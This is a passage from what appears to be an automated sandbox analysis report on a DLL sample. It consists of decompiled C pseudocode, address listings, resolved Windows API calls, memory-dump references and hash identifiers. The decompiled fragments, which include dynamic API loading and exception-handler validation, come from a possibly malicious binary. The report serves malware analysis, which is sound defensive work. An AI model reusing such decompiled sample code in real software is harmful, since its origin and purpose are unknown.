                                                                                                                                                                                                                                                                    							L26:
                                                                                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    						_t60 = _t59 + 0x9c9664bb;
                                                                                                                                                                                                                                                                    						__eflags = _t60;
                                                                                                                                                                                                                                                                    						_v20 = _t60;
                                                                                                                                                                                                                                                                    						goto L26;
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				L27:
                                                                                                                                                                                                                                                                    				return _v20;
                                                                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                                                                    0x6e1f1f31
                                                                                                                                                                                                                                                                    0x6e1f1f3a
                                                                                                                                                                                                                                                                    0x6e1f1f3f
                                                                                                                                                                                                                                                                    0x6e1f1f45
                                                                                                                                                                                                                                                                    0x6e1f1f4e
                                                                                                                                                                                                                                                                    0x6e1f1f54
                                                                                                                                                                                                                                                                    0x6e1f1f56
                                                                                                                                                                                                                                                                    0x6e1f1f59
                                                                                                                                                                                                                                                                    0x6e1f1f5e
                                                                                                                                                                                                                                                                    0x6e1f1f65
                                                                                                                                                                                                                                                                    0x6e1f1f65
                                                                                                                                                                                                                                                                    0x6e1f1f69
                                                                                                                                                                                                                                                                    0x6e1f1f71
                                                                                                                                                                                                                                                                    0x6e1f1f74
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1f7a
                                                                                                                                                                                                                                                                    0x6e1f1f84
                                                                                                                                                                                                                                                                    0x6e1f1f86
                                                                                                                                                                                                                                                                    0x6e1f1f89
                                                                                                                                                                                                                                                                    0x6e1f1f8c
                                                                                                                                                                                                                                                                    0x6e1f1f90
                                                                                                                                                                                                                                                                    0x6e1f1f98
                                                                                                                                                                                                                                                                    0x6e1f1f9a
                                                                                                                                                                                                                                                                    0x6e1f1f9d
                                                                                                                                                                                                                                                                    0x6e1f2005
                                                                                                                                                                                                                                                                    0x6e1f2005
                                                                                                                                                                                                                                                                    0x6e1f2009
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1fa2
                                                                                                                                                                                                                                                                    0x6e1f1fa8
                                                                                                                                                                                                                                                                    0x6e1f1faa
                                                                                                                                                                                                                                                                    0x6e1f1fbd
                                                                                                                                                                                                                                                                    0x6e1f1fc0
                                                                                                                                                                                                                                                                    0x6e1f1fc0
                                                                                                                                                                                                                                                                    0x6e1f1fc0
                                                                                                                                                                                                                                                                    0x6e1f1fc4
                                                                                                                                                                                                                                                                    0x6e1f1fac
                                                                                                                                                                                                                                                                    0x6e1f1fac
                                                                                                                                                                                                                                                                    0x6e1f1fb4
                                                                                                                                                                                                                                                                    0x6e1f1fb6
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1fb6
                                                                                                                                                                                                                                                                    0x6e1f1fa4
                                                                                                                                                                                                                                                                    0x6e1f1fa4
                                                                                                                                                                                                                                                                    0x6e1f1fb8
                                                                                                                                                                                                                                                                    0x6e1f1fb8
                                                                                                                                                                                                                                                                    0x6e1f1fb8
                                                                                                                                                                                                                                                                    0x6e1f1fc7
                                                                                                                                                                                                                                                                    0x6e1f1fca
                                                                                                                                                                                                                                                                    0x6e1f1fcc
                                                                                                                                                                                                                                                                    0x6e1f1fd3
                                                                                                                                                                                                                                                                    0x6e1f1fce
                                                                                                                                                                                                                                                                    0x6e1f1fce
                                                                                                                                                                                                                                                                    0x6e1f1fce
                                                                                                                                                                                                                                                                    0x6e1f1fdb
                                                                                                                                                                                                                                                                    0x6e1f1fe1
                                                                                                                                                                                                                                                                    0x6e1f1fe3
                                                                                                                                                                                                                                                                    0x6e1f2013
                                                                                                                                                                                                                                                                    0x6e1f1fe5
                                                                                                                                                                                                                                                                    0x6e1f1fe5
                                                                                                                                                                                                                                                                    0x6e1f1fe8
                                                                                                                                                                                                                                                                    0x6e1f1fea
                                                                                                                                                                                                                                                                    0x6e1f1ff2
                                                                                                                                                                                                                                                                    0x6e1f1ff2
                                                                                                                                                                                                                                                                    0x6e1f1ff7
                                                                                                                                                                                                                                                                    0x6e1f1ff9
                                                                                                                                                                                                                                                                    0x6e1f2000
                                                                                                                                                                                                                                                                    0x6e1f2002
                                                                                                                                                                                                                                                                    0x6e1f2002
                                                                                                                                                                                                                                                                    0x6e1f2002
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2002
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1fe3
                                                                                                                                                                                                                                                                    0x6e1f1f92
                                                                                                                                                                                                                                                                    0x6e1f1f94
                                                                                                                                                                                                                                                                    0x6e1f1f96
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1f96
                                                                                                                                                                                                                                                                    0x6e1f2016
                                                                                                                                                                                                                                                                    0x6e1f2016
                                                                                                                                                                                                                                                                    0x6e1f201d
                                                                                                                                                                                                                                                                    0x6e1f2022
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2028
                                                                                                                                                                                                                                                                    0x6e1f2033
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2033
                                                                                                                                                                                                                                                                    0x6e1f202a
                                                                                                                                                                                                                                                                    0x6e1f202a
                                                                                                                                                                                                                                                                    0x6e1f2030
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2030
                                                                                                                                                                                                                                                                    0x6e1f1f5e
                                                                                                                                                                                                                                                                    0x6e1f2034
                                                                                                                                                                                                                                                                    0x6e1f2039

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6E1F1F69
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 6E1F1FDB
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605070540.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605056165.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605084485.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605091636.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605100957.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2574300362-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2822e8a49a1d3424cf7c4ae2426bf4ac50799e21ea44da6f87e9c950cb8b8b59
                                                                                                                                                                                                                                                                    • Instruction ID: 8a8082c5cc87258127c1f1d0b55cb505568c7ec8bd6639ecabd91114d9510ff6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2822e8a49a1d3424cf7c4ae2426bf4ac50799e21ea44da6f87e9c950cb8b8b59
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE315BB2B00206DFDB44CF9AC890AAEB7F4BF15304B254169D811E7241E774DA8AEB91
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E247670,?,?,00000008,?,?,6E247308,00000000), ref: 6E2478A2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                    • Opcode ID: 37e966f4fbede969dc89fdaf09762f18c65ca33cf59fca0c7cd27038bc374f9f
                                                                                                                                                                                                                                                                    • Instruction ID: 4327612b7bfbb29069c6ad586f5cf40563cd91c9260836dac3189bff74622351
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37e966f4fbede969dc89fdaf09762f18c65ca33cf59fca0c7cd27038bc374f9f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5B15A3562060ACFD749CF68C496B547BA2FF05365F258658E8B9CF2E1C335EA92CB40
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                    			E6E1F2485(long _a4) {
                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                    				short* _v32;
                                                                                                                                                                                                                                                                    				void _v36;
                                                                                                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                                                    				signed int* _t68;
                                                                                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                    				void _t80;
                                                                                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                                                                                    				short* _t87;
                                                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                                                    				signed int* _t90;
                                                                                                                                                                                                                                                                    				long _t91;
                                                                                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                                                                                    				signed int _t100;
                                                                                                                                                                                                                                                                    				signed int _t102;
                                                                                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                                                                                    				long _t108;
                                                                                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t108 = _a4;
                                                                                                                                                                                                                                                                    				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                                                    				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                                                    				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                                                    				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                                                    					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                                                    					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                                                    					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                                                    						_t91 = 0;
                                                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                                                    						_a4 = 0;
                                                                                                                                                                                                                                                                    						_t57 = _t76;
                                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                                    							_t80 =  *_t57;
                                                                                                                                                                                                                                                                    							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                                                    							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                                                    							if(_t80 >= _t91) {
                                                                                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                                                                                    								_t63 = 0;
                                                                                                                                                                                                                                                                    								L60:
                                                                                                                                                                                                                                                                    								return _t63;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                                                    							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                                                    							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                                                    								_t12 =  &_a4;
                                                                                                                                                                                                                                                                    								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                                                    								__eflags =  *_t12;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                                                                                                                                    							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                                                    							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                                                    						} while (_t91 <= _t102);
                                                                                                                                                                                                                                                                    						__eflags = _a4;
                                                                                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                                                                    							_t81 =  *0x6e1f41f8;
                                                                                                                                                                                                                                                                    							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                                                    							_t58 = 0;
                                                                                                                                                                                                                                                                    							__eflags = _t81;
                                                                                                                                                                                                                                                                    							if(_t81 <= 0) {
                                                                                                                                                                                                                                                                    								L18:
                                                                                                                                                                                                                                                                    								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                                                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                                                    								__eflags = _t61;
                                                                                                                                                                                                                                                                    								if(_t61 < 0) {
                                                                                                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                    									_t62 = _a4;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								__eflags = _t62;
                                                                                                                                                                                                                                                                    								if(_t62 == 0) {
                                                                                                                                                                                                                                                                    									L59:
                                                                                                                                                                                                                                                                    									_t63 = _t104;
                                                                                                                                                                                                                                                                    									goto L60;
                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                    									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                                                    									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                                                    									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                                                    										L46:
                                                                                                                                                                                                                                                                    										_t63 = 1;
                                                                                                                                                                                                                                                                    										 *0x6e1f4240 = 1;
                                                                                                                                                                                                                                                                    										__eflags =  *0x6e1f4240;
                                                                                                                                                                                                                                                                    										if( *0x6e1f4240 != 0) {
                                                                                                                                                                                                                                                                    											goto L60;
                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                    										_t84 =  *0x6e1f41f8;
                                                                                                                                                                                                                                                                    										__eflags = _t84;
                                                                                                                                                                                                                                                                    										_t93 = _t84;
                                                                                                                                                                                                                                                                    										if(_t84 <= 0) {
                                                                                                                                                                                                                                                                    											L51:
                                                                                                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                                                                                                    											if(_t93 != 0) {
                                                                                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                                                                                    												 *0x6e1f4240 = 0;
                                                                                                                                                                                                                                                                    												goto L5;
                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                    											_t77 = 0xf;
                                                                                                                                                                                                                                                                    											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                                                    											if(_t84 <= _t77) {
                                                                                                                                                                                                                                                                    												_t77 = _t84;
                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                    											_t94 = 0;
                                                                                                                                                                                                                                                                    											__eflags = _t77;
                                                                                                                                                                                                                                                                    											if(_t77 < 0) {
                                                                                                                                                                                                                                                                    												L56:
                                                                                                                                                                                                                                                                    												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                                                    												if(_t84 < 0x10) {
                                                                                                                                                                                                                                                                    													_t86 = _t84 + 1;
                                                                                                                                                                                                                                                                    													__eflags = _t86;
                                                                                                                                                                                                                                                                    													 *0x6e1f41f8 = _t86;
                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                    												do {
                                                                                                                                                                                                                                                                    													_t68 = 0x6e1f4200 + _t94 * 4;
                                                                                                                                                                                                                                                                    													_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                    													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                                                    													 *_t68 = _t110;
                                                                                                                                                                                                                                                                    													_t110 =  *_t68;
                                                                                                                                                                                                                                                                    												} while (_t94 <= _t77);
                                                                                                                                                                                                                                                                    												goto L56;
                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                    										_t69 = 0x6e1f41fc + _t84 * 4;
                                                                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                                                                    											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                                                    											if( *_t69 == _t110) {
                                                                                                                                                                                                                                                                    												goto L51;
                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                    											_t93 = _t93 - 1;
                                                                                                                                                                                                                                                                    											_t69 = _t69 - 4;
                                                                                                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                                                                                                    											if(_t93 > 0) {
                                                                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                    											goto L51;
                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                    										goto L51;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    									_t87 = _v32;
                                                                                                                                                                                                                                                                    									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                                                    									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                                                    									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                                                    									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                                                    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                                                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                                                    									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                                                    									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                                                    									if(_t78 < _t72) {
                                                                                                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                                                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                                                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                                                    										goto L20;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                    								goto L16;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0x6e1f4200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(0x6e1f4200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								_t58 = _t58 + 1;
                                                                                                                                                                                                                                                                    								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                                                    								if(_t58 < _t81) {
                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                                                    							if(_t58 <= 0) {
                                                                                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							 *0x6e1f4240 = 1;
                                                                                                                                                                                                                                                                    							__eflags =  *0x6e1f4240;
                                                                                                                                                                                                                                                                    							if( *0x6e1f4240 != 0) {
                                                                                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							__eflags =  *((intOrPtr*)(0x6e1f4200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(0x6e1f4200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                                                                                    								_t100 = 0;
                                                                                                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                                                                                                    								if(_t58 < 0) {
                                                                                                                                                                                                                                                                    									L34:
                                                                                                                                                                                                                                                                    									 *0x6e1f4240 = 0;
                                                                                                                                                                                                                                                                    									goto L5;
                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                    									L33:
                                                                                                                                                                                                                                                                    									_t90 = 0x6e1f4200 + _t100 * 4;
                                                                                                                                                                                                                                                                    									_t100 = _t100 + 1;
                                                                                                                                                                                                                                                                    									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                                                    									 *_t90 = _t110;
                                                                                                                                                                                                                                                                    									_t110 =  *_t90;
                                                                                                                                                                                                                                                                    								} while (_t100 <= _t58);
                                                                                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							_t58 = _t81 - 1;
                                                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                                                    							if(_t58 < 0) {
                                                                                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                                                                                    								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                                                    								if(_t81 < 0x10) {
                                                                                                                                                                                                                                                                    									_t81 = _t81 + 1;
                                                                                                                                                                                                                                                                    									__eflags = _t81;
                                                                                                                                                                                                                                                                    									 *0x6e1f41f8 = _t81;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								_t58 = _t81 - 1;
                                                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                    								L25:
                                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0x6e1f4200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(0x6e1f4200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								_t58 = _t58 - 1;
                                                                                                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                                                                                                    								if(_t58 >= 0) {
                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							goto L28;
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                                                    						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                                                    						if(_t75 < _v8) {
                                                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                                                    						if(_t75 >= _t108) {
                                                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                                                                                                    					goto L60;
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    			}




































                                                                                                                                                                                                                                                                    0x6e1f248f
                                                                                                                                                                                                                                                                    0x6e1f2492
                                                                                                                                                                                                                                                                    0x6e1f2498
                                                                                                                                                                                                                                                                    0x6e1f24b6
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f24b6
                                                                                                                                                                                                                                                                    0x6e1f24a0
                                                                                                                                                                                                                                                                    0x6e1f24a9
                                                                                                                                                                                                                                                                    0x6e1f24af
                                                                                                                                                                                                                                                                    0x6e1f24be
                                                                                                                                                                                                                                                                    0x6e1f24c1
                                                                                                                                                                                                                                                                    0x6e1f24c4
                                                                                                                                                                                                                                                                    0x6e1f24ce
                                                                                                                                                                                                                                                                    0x6e1f24ce
                                                                                                                                                                                                                                                                    0x6e1f24d0
                                                                                                                                                                                                                                                                    0x6e1f24d3
                                                                                                                                                                                                                                                                    0x6e1f24d5
                                                                                                                                                                                                                                                                    0x6e1f24d5
                                                                                                                                                                                                                                                                    0x6e1f24d7
                                                                                                                                                                                                                                                                    0x6e1f24da
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f24dc
                                                                                                                                                                                                                                                                    0x6e1f24de
                                                                                                                                                                                                                                                                    0x6e1f2544
                                                                                                                                                                                                                                                                    0x6e1f2544
                                                                                                                                                                                                                                                                    0x6e1f26a2
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f26a2
                                                                                                                                                                                                                                                                    0x6e1f24e0
                                                                                                                                                                                                                                                                    0x6e1f24e0
                                                                                                                                                                                                                                                                    0x6e1f24e4
                                                                                                                                                                                                                                                                    0x6e1f24e6
                                                                                                                                                                                                                                                                    0x6e1f24e6
                                                                                                                                                                                                                                                                    0x6e1f24e6
                                                                                                                                                                                                                                                                    0x6e1f24e6
                                                                                                                                                                                                                                                                    0x6e1f24e9
                                                                                                                                                                                                                                                                    0x6e1f24ea
                                                                                                                                                                                                                                                                    0x6e1f24ed
                                                                                                                                                                                                                                                                    0x6e1f24ed
                                                                                                                                                                                                                                                                    0x6e1f24f1
                                                                                                                                                                                                                                                                    0x6e1f24f5
                                                                                                                                                                                                                                                                    0x6e1f2503
                                                                                                                                                                                                                                                                    0x6e1f2503
                                                                                                                                                                                                                                                                    0x6e1f250b
                                                                                                                                                                                                                                                                    0x6e1f2511
                                                                                                                                                                                                                                                                    0x6e1f2513
                                                                                                                                                                                                                                                                    0x6e1f2515
                                                                                                                                                                                                                                                                    0x6e1f2525
                                                                                                                                                                                                                                                                    0x6e1f2532
                                                                                                                                                                                                                                                                    0x6e1f2536
                                                                                                                                                                                                                                                                    0x6e1f253b
                                                                                                                                                                                                                                                                    0x6e1f253d
                                                                                                                                                                                                                                                                    0x6e1f25bb
                                                                                                                                                                                                                                                                    0x6e1f25bb
                                                                                                                                                                                                                                                                    0x6e1f253f
                                                                                                                                                                                                                                                                    0x6e1f253f
                                                                                                                                                                                                                                                                    0x6e1f253f
                                                                                                                                                                                                                                                                    0x6e1f25bd
                                                                                                                                                                                                                                                                    0x6e1f25bf
                                                                                                                                                                                                                                                                    0x6e1f26a0
                                                                                                                                                                                                                                                                    0x6e1f26a0
